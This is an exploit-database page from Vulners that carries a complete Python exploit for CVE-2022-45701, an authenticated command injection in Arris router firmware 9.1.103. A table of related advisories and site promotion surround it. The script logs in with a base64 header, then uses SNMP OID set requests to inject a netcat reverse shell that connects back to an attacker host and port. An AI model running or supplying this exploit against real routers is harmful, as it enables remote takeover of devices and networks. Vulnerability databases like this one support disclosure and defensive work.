Vulners
Lucene search
Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Arris Router Firmware 9.1.103 Remote Code Execution Exploit | 15 Feb 202300:00 | – | zdt |
| Arris Router Firmware 9.1.103 - Remote Code Execution (Authenticated) Exploit | 6 Apr 202300:00 | – | zdt |
 | CVE-2022-45701 | 17 Feb 202318:13 | – | circl |
 | ARRIS TG2482A 安全漏洞 | 17 Feb 202300:00 | – | cnnvd |
 | CVE-2022-45701 | 17 Feb 202300:00 | – | cve |
 | CVE-2022-45701 | 17 Feb 202300:00 | – | cvelist |
 | Exploit for Command Injection in Commscope Arris_Tg2482A_Firmware | 9 Aug 202419:30 | – | githubexploit |
 | Arris router vulnerability could lead to complete takeover | 16 Feb 202310:00 | – | malwarebytes |
 | CVE-2022-45701 | 17 Feb 202315:15 | – | nvd |
 | CVE-2022-45701 | 17 Feb 202315:15 | – | osv |
10
# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Date: 17/11/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.commscope.com/
# Version: 9.1.103
# Tested on: TG2482A, TG2492, SBG10
# CVE : CVE-2022-45701
import requests
import base64
router_host = "http://192.168.0.1"
username = "admin"
password = "password"
lhost = "192.168.0.6"
lport = 80
def main():
print("Authorizing...")
cookie = get_cookie(gen_header(username, password))
if cookie == '':
print("Failed to authorize")
exit(-1)
print("Generating Payload...")
payload = gen_payload(lhost, lport)
print("Sending Payload...")
send_payload(payload, cookie)
print("Done, check shell..")
def gen_header(u, p):
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")
def no_encode_params(params):
return "&".join("%s=%s" % (k,v) for k,v in params.items())
def get_cookie(header):
url = router_host+"/login"
params = no_encode_params({"arg":header, "_n":1})
resp=requests.get(url, params=params)
return resp.content.decode('UTF-8')
def set_oid(oid, cookie):
url = router_host+"/snmpSet"
params = no_encode_params({"oid":oid, "_n":1})
cookies = {"credential":cookie}
requests.get(url, params=params, cookies=cookies)
def gen_payload(h, p):
return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"
def send_payload(payload, cookie):
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)
set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)
if __name__ == '__main__':
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Apr 2023 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 3.18.8
EPSS0.35297
SSVC